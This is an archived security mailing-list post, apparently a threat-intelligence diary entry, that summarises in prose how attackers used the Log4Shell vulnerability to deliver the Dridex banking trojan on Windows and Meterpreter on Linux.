[MART] - Daily Diary #415 - Dridex Malware Delivered Via Log4Shell

CTAS-MAT ctas-mat at appgate.com
Mon Dec 20 21:35:32 UTC 2021


I hope everyone is doing well!

Below is the entry for today.

12/20/2021 - Diary entry #415:

As mentioned in our Daily Diaries #114 and #116, Dridex is a major banking trojan that appeared somewhere around 2011, continually evolving ever since. The APT (Advanced Persistence Threat) group behind this malware is known as TA5051, the same developers of TrickBot and Locky ransomware.

Recently, threat actors started to exploit Log4Shell, a critical Apache Log4j vulnerability, to deliver Dridex to vulnerable systems. They are using an exploit variation that relies on RMI (Remote Method Invocation) instead of LDAP (Lightweight Directory Access Protocol) as callback URLs to execute their Java classes payloads.

As soon as it's executed, on Windows, the payload downloads an HTA file that executes a VBS script responsible for installing and launching Dridex using RegSvr32.exe, a native Windows binary. On Linux devices, it executes a Python script to install Meterpreter that invokes a remote shell used to deploy other payloads.

Besides its Trojan capabilities, Dridex is also known for deploying other threats such as different Ransomware strains. Therefore, Dridex has been used as a Malware-As-A-Service, due to its capacity of spreading and its threat actors' efforts to take advantage of vectors with large attack surfaces like Log4Shell.

Kind Regards,


[https://d3aafpijpsak2t.cloudfront.net/images/Signature/likedin@2x.png]<https://www.linkedin.com/company/appgate-security/>     [https://d3aafpijpsak2t.cloudfront.net/images/Signature/twitter@2x.png] <https://twitter.com/AppgateSecurity>   [https://d3aafpijpsak2t.cloudfront.net/images/Signature/youtube@2x.png] <https://www.youtube.com/channel/UC-8GvxcZbm-R3EJNl8jYjiQ>

Felipe Tarijon de Almeida
Malware Analyst

E: felipe.tarijon at appgate.com<mailto:felipe.tarijon at appgate.com>
C: +55 11 97467 9549

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.immunityinc.com/pipermail/mart/attachments/20211220/d7e34236/attachment.htm>

More information about the MART mailing list